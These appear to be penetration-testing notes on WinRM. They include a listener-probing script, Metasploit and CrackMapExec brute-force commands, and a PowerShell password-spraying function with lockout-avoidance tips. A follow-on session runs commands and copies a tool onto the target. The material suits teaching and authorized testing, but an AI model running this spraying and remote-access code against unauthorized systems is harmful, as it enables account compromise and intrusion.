Windows Remote Management (WinRM) is the Microsoft implementation of the WS-Management protocol, a standard SOAP (Simple Object Access Protocol) based protocol for remote management. It usually runs on port 5985.
PowerShell Remoting (PSRemoting) runs on top of WinRM: it is the transport behind Invoke-Command and Enter-PSSession, which is how you log in to a host and execute commands remotely.
You can enable WinRM by running Enable-PSRemoting from an elevated prompt; it starts the WinRM service, creates the HTTP listener and adds the matching firewall rule.
By default WinRM listens on port 5985 for HTTP and 5986 for HTTPS. Traffic on 5985 is still protected when Kerberos or NTLM authentication is used, because the SOAP message body is encrypted at the application layer; only Basic authentication over HTTP is cleartext, and the service refuses it unless AllowUnencrypted has been set on both sides.
If an HTTP request to http://host:5985/wsman gets any HTTP response at all, the WinRM listener is up. Do not expect a 200: the endpoint wants an authenticated POST, so an unauthenticated GET normally comes back as 401 Unauthorized or 405 Method Not Allowed. A connection refused or a timeout means no listener (or a firewall in the way).
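The check above as an added example (not code from the original notes): a PowerShell function that requests /wsman on each host, treats any HTTP status as "listener present", and then asks the stack to identify itself with Test-WSMan. Host names in the usage line are made up for the example; it defaults to 5985 because probing 5986 with a self-signed certificate needs extra handling in Windows PowerShell.

```powershell
# Added example (not from the original notes): probe hosts for a WinRM listener by
# requesting /wsman and classifying the reply. Host names below are hypothetical.
function Test-WinRMListener {
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [int]$Port = 5985            # 5986 (HTTPS) needs certificate handling, see the note below
    )
    foreach ($target in $ComputerName) {
        $uri    = "http://${target}:${Port}/wsman"
        $status = $null
        try {
            # The endpoint expects an authenticated POST, so a GET is normally
            # rejected; what matters is whether anything answers over HTTP at all.
            $resp   = Invoke-WebRequest -Uri $uri -Method Get -UseBasicParsing -TimeoutSec 5 -ErrorAction Stop
            $status = [int]$resp.StatusCode
        } catch {
            if ($_.Exception.Response) {
                # Windows PowerShell throws WebException, PowerShell 7 throws HttpResponseException;
                # both expose the response, typically 401 Unauthorized or 405 Method Not Allowed.
                $status = [int]$_.Exception.Response.StatusCode
            }
            # No response object: connection refused, filtered or timed out -> no listener.
        }
        $stack = $null
        if ($status) {
            # Unauthenticated Identify request; returns $null if anonymous identify is refused.
            $stack = (Test-WSMan -ComputerName $target -Port $Port -ErrorAction SilentlyContinue).ProductVersion
        }
        [pscustomobject]@{
            ComputerName = $target
            Port         = $Port
            HttpStatus   = $status
            Listening    = ($null -ne $status)
            Stack        = $stack
        }
    }
}

# Usage: sweep a few hosts (names are placeholders for the example).
Test-WinRMListener -ComputerName 'DC', 'WS01', '192.168.1.10' | Format-Table -AutoSize
```

The Stack column comes from the WS-Management Identify response, which the service answers without credentials by default and which tells you the stack version before you spend any logon attempts. For 5986 use -UseSSL on Test-WSMan and, on PowerShell 7, -SkipCertificateCheck on Invoke-WebRequest when the host has a self-signed certificate.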
Non-administrators can only connect if they are members of the Remote Management Users group (or are granted access in the session configuration ACL). Adding the user bowen to that group, from an administrative prompt:
net localgroup "Remote Management Users" /add bowen
The winrm_login module is the standard Metasploit login scanner for brute-forcing WinRM passwords:
use auxiliary/scanner/winrm/winrm_login
CrackMapExec does the same across a range; every user in userfile is tried against every password in passwordfile, so mind the domain lockout threshold:
cme winrm 192.168.1.0/24 -u userfile -p passwordfile
From a PowerShell prompt (Invoke-Command goes over WinRM; the domain, host and account below are the notes' example values):
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
# Single-quoted strings do not process escapes, so the domain separator is one backslash, not two
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
# For an interactive shell on the same host: Enter-PSSession -ComputerName DC -Credential $cred
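An added example tying the brute-force and credentialed-access parts together (not code from the original notes): candidate credentials are checked natively with Test-WSMan instead of Metasploit or CrackMapExec, and the first valid pair is used to open one PSSession that is reused for several commands and a file copy. The host, accounts, the second password and the file path are placeholders.

```powershell
# Added example (not from the original notes): validate candidate credentials over
# WinRM with Test-WSMan, then reuse one PSSession for several commands and a file copy.
# Host, accounts, 'Winter2024!' and .\tool.ps1 are placeholders.

function Test-WinRMCredential {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][string[]]$UserName,   # DOMAIN\user or user@domain
        [Parameter(Mandatory)][string[]]$Password
    )
    # Every failed attempt counts against the account lockout threshold: keep the
    # password list per sweep short (a spray), or check the policy first.
    foreach ($u in $UserName) {
        foreach ($p in $Password) {
            $secure = ConvertTo-SecureString $p -AsPlainText -Force
            $cred   = New-Object System.Management.Automation.PSCredential ($u, $secure)
            $valid  = $false
            $reason = $null
            try {
                # Authenticated Identify request. Access denied throws, so a clean return
                # means the WinRM service accepted the credential. It does NOT prove the
                # user may use the PowerShell endpoint: that needs Remote Management Users
                # (or admin) membership, and shows up as access denied on New-PSSession.
                Test-WSMan -ComputerName $ComputerName -Credential $cred -Authentication Negotiate -ErrorAction Stop | Out-Null
                $valid = $true
            } catch {
                $reason = $_.Exception.Message   # wrong password, lockout, or transport error
            }
            [pscustomobject]@{ ComputerName = $ComputerName; User = $u; Password = $p; Valid = $valid; Reason = $reason }
        }
    }
}

# Usage: two candidate passwords against two accounts (placeholders), then use the first hit.
$results = Test-WinRMCredential -ComputerName 'DC' `
    -UserName 'ECORP.local\morph3', 'ECORP.local\bowen' `
    -Password 'Winter2024!', 'supersecurepassword'
$results | Format-Table -AutoSize

$hit = $results | Where-Object Valid | Select-Object -First 1
if ($hit) {
    $cred = New-Object System.Management.Automation.PSCredential (
        $hit.User, (ConvertTo-SecureString $hit.Password -AsPlainText -Force))

    # One session, many commands: avoids a fresh logon per Invoke-Command and keeps
    # variables and loaded modules alive between calls.
    $s = New-PSSession -ComputerName $hit.ComputerName -Credential $cred
    Invoke-Command -Session $s -ScriptBlock { whoami /all }
    Invoke-Command -Session $s -ScriptBlock { Get-Service WinRM | Select-Object Status, StartType }

    # Copy a local file into the remote session (PowerShell 5.0 and later).
    Copy-Item -Path .\tool.ps1 -Destination 'C:\Windows\Temp\' -ToSession $s

    # Interactive shell over the same session, if needed:
    # Enter-PSSession -Session $s
    Remove-PSSession $s
}
```

The Reason column separates a bad password from a locked account or a dead transport, which matters when you are deciding whether to keep going against a domain with a lockout policy. If Test-WSMan succeeds but New-PSSession is denied, the credential is good and the user is simply not authorized for the endpoint, which is exactly what the Remote Management Users group membership above fixes.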